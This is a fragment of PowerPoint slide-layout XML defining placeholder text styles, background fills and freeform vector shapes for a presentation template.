            <a:ext cx="4508581" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3137">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="336145" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="560241" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="784338" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1008435" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>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p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>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24" name="TextBox 23"/>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26011183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Diagram layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform: Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1428466"/>
            <a:ext cx="12191999" cy="5429535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY7" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 531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5316786">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12191999" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12191999" y="119540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315199" y="119540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315199" y="5315056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5316786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5F2FC"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="896386">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1765" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7692554" y="1889196"/>
            <a:ext cx="3977545" cy="4576917"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx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324464" y="358848"/>
            <a:ext cx="11384209" cy="892552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="110400"/>
            <a:ext cx="3048001" cy="355158"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13237900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1" y="1189177"/>
            <a:ext cx="11653523" cy="2162131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="392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796596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Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090210" y="126993"/>
            <a:ext cx="9043734" cy="6634630"/>
            <a:chOff x="1951" y="0"/>
            <a:chExt cx="5890" cy="4321"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 218"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="2190"/>
              <a:ext cx="5871" cy="2131"/>
              <a:chOff x="1951" y="2190"/>
              <a:chExt cx="5871" cy="2131"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1561" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="219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25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="219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26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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28"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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29"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3827" y="219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30"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070" y="219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Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5609"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Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="2202"/>
                <a:ext cx="188" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 86 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 86 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 136 h 220"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 136 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 136 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 136 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 86 h 220"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 86 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 86 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 86 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 136 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 136 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>
                  <a:gd name="T67" fmla="*/ 8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20">
                    <a:moveTo>
                      <a:pt x="188" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120"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Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159" y="219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Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="2198"/>
                <a:ext cx="154"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Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701" y="2198"/>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Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045" y="219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Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="219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Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392" y="219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2" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589" y="219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Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739" y="219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Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="2190"/>
                <a:ext cx="219" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 208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1 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 63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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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6"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
